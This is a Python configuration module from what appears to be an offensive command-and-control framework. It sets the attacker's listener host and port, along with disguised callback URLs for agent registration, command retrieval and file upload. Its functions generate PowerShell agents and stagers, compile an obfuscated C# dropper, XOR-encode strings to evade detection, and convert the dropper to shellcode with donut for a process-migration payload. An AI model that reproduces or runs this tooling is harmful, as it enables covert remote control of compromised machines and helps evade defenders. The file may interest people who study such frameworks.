# Embedded file name: core\config.py import base64 import string import subprocess import donut from rich.console import Console from core.Encryption import generate_key from core.Obfuscate import * campaign_name = 'Baldie-campaign' PORT = '8082' VERSION = '2.2' AGENTS = dict() COMMAND = dict() TIME = dict() COUNT = 0 WEBSHELLS=dict() WEBSHELL_COUNT=0 HOST='192.168.5.106' BASE = 'Ninja' POINTER = 'main' Implant_Type='agent' PAYLOADS = [] Donut=True SSL=False CERT='' KEY='' KDATE="30/03/2026" beacon='1' #AESKey="+4hOi8+xxOki+Mg9Y4+GuD7g7n2eytMa5KF6zNnaPz0=" AESKey=base64.b64encode(bytearray("".join([random.choice(string.ascii_uppercase) for i in range(32)]), "UTF-8")).decode() raw_payload="/names" b52_payload="/methods" b64_stager="/context" b52_stager="/name" hjf_payload="/operation" b64_payload="/xmethods" hjfs_payload="/operations" sct_payload="/jbossws" hta_payload="/extwsdl" register_url="/atom" download_url="/publishing" upload_url="/axis" image_url="/index" command_url="/publish" result_url="/uddisoap" modules_url="/svce" follina_url="/inquiryapi" console = Console(style="red") def PAYLOAD(): global HOST global PORT fp = open('core/agents/payload2.ps1', 'r') ps1 = fp.read() if SSL: ps1 = ps1.replace('{ip}', HOST).replace('{port}', PORT).replace('{beacon}', beacon).replace('{register}', register_url).replace('{download}', download_url).replace('{upload}', upload_url).replace('{image}', image_url).replace('{cmd}',command_url).replace('{re}', result_url).replace('{md}', modules_url).replace('{HTTP}', "https").replace('{DATE}', KDATE) else: ps1 = ps1.replace('{ip}', HOST).replace('{port}', PORT).replace('{beacon}', beacon).replace('{register}', register_url).replace('{download}', download_url).replace('{upload}', upload_url).replace('{image}', image_url).replace('{cmd}',command_url).replace('{re}', result_url).replace('{md}', modules_url).replace('{HTTP}', "http").replace('{DATE}', KDATE) payload = open('utils/payloads/Powershell/raw_payload.ps1', 'w') payload.write(ps1) payload.close() console.log("[green][+] Raw Payload written to:[/green] [cyan]utils/payloads/Powershell/raw_payload.ps1[/cyan]") return ps1 def STAGER(): global HOST global PORT fp = open('core/agents/stager.ps1', 'r') ps1 = fp.read() if SSL: ps1 = ps1.replace('{ip}', HOST).replace('{port}', PORT).replace('{b64payload}', b64_payload).replace('{HTTP}',"https") else: ps1 = ps1.replace('{ip}', HOST).replace('{port}', PORT).replace('{b64payload}', b64_payload).replace('{HTTP}',"http") payload = open('utils/payloads/Powershell/base64_stager.ps1', 'w') payload.write(ps1) payload.close() console.log("[green][+] Stager Payload written to:[/green] [cyan]utils/payloads/Powershell/base64_stager.ps1[/cyan]") return ps1 def cspayload(): fp = open('core/agents/simple_dropper.ninja', 'r') fpo = open('utils/payloads/Executables/cs_dropper.cs', 'w') cs = fp.read() if SSL: cs = cs.replace('{ip}', csobf(HOST)).replace('{port}', csobf(PORT)).replace('{b64_stager}',csobf(b64_stager)).replace('{http}', csobf("https://")) else: cs = cs.replace('{ip}', csobf(HOST)).replace('{port}', csobf(PORT)).replace('{b64_stager}',csobf(b64_stager)).replace('{http}', csobf("http://")) fpo.write(cs) fpo.close() fp.close() exe = "mono-csc -r:core/lib/System.Management.Automation.dll utils/payloads/Executables/cs_dropper.cs -out:utils/payloads/Executables/dropper_cs.exe -target:exe -warn:2" dll = "mono-csc -r:core/lib/System.Management.Automation.dll utils/payloads/Executables/cs_dropper.cs -out:utils/payloads/Executables/dropper_cs.dll -target:library -warn:2" try: subprocess.check_output(dll, shell=True) console.log("[green][+] C# Dropper DLL written to:[/green] [cyan]utils/payloads/Executables/dropper_cs.dll[/cyan]") except Exception as e: console.print('[-] ERROR generating csharp payload : %s' % str(e)) try: subprocess.check_output(exe, shell=True) console.log("[green][+] C# Dropper EXE written to:[/green] [cyan]utils/payloads/Executables/dropper_cs.exe[/cyan]") except Exception as e: console.print('[-] ERROR generating csharp payload : %s' % str(e)) def obfuscate(): global obfuscated # cmd="""pwsh -c \"./Out-ObfuscatedStringCommand.ps1;Out-ObfuscatedStringCommand -Path payloads/raw_payload.ps1 -ObfuscationLevel 3 > payloads/payload-obf.ps1\" """ # cmd="""pwsh -c \"Import-Module ./lib/Invoke-Obfuscation/Invoke-Obfuscation.psd1;Out-EncodedBinaryCommand -Path payloads/raw_payload.ps1 -NoProfile -NonInteractive -PassThru > payloads/payload-obf.ps1\" """ try: # subprocess.check_output(cmd, shell=True) f = open("utils/payloads/Powershell/raw_payload.ps1", "rb") payload = f.read() f = open("utils/payloads/Powershell/payload-obf.ps1", "w") f.write(obfvar(payload.decode("UTF-8"))) f.close() console.log("[green][+] Obfuscated payload written to:[/green] [cyan]utils/payloads/Powershell/payload-obf.ps1[/cyan]") # obfuscated=True except Exception as e: console.print('[-] ERROR generating obfuscated payload : %s' % str(e)) def Obfuscated_PAYLOAD(): f = open("utils/payloads/Powershell/raw_payload.ps1", "rb") payload = f.read() return obfvar(payload.decode("UTF-8")) def migrator(): shellcode = donut.create(file="utils/payloads/Executables/dropper_cs.exe") fp = open('core/agents/Migrator.ninja', 'r') temp = fp.read() temp = temp.replace('{shellcode}', base64.b64encode(shellcode).decode("utf-8")).replace('{class}', "".join( [random.choice(string.ascii_uppercase) for i in range(5)])) output = open('Modules/Migrator.ps1', 'w') output.write(temp) output.close() console.log("[green][+] Migrator payload written to:[/green] [cyan]Modules/Migrator.ps1[/cyan]") def csobf(str): d = "" for i in str: d = d + chr((ord(i)) ^ 45) return base64.b64encode(bytearray(d, "UTF-8")).decode("UTF-8") def set_port(in_port): global PORT PORT = in_port def set_count(in_count): global COUNT COUNT = in_count def set_pointer(in_pointer): global POINTER POINTER = in_pointer def set_ip(in_ip): global HOST HOST = in_ip def set_time(id, in_time): TIME[id] = in_time - TIME[id] def get_pointer(): global POINTER return POINTER def set_key(): global AESKey AESKey = generate_key() # print AESKey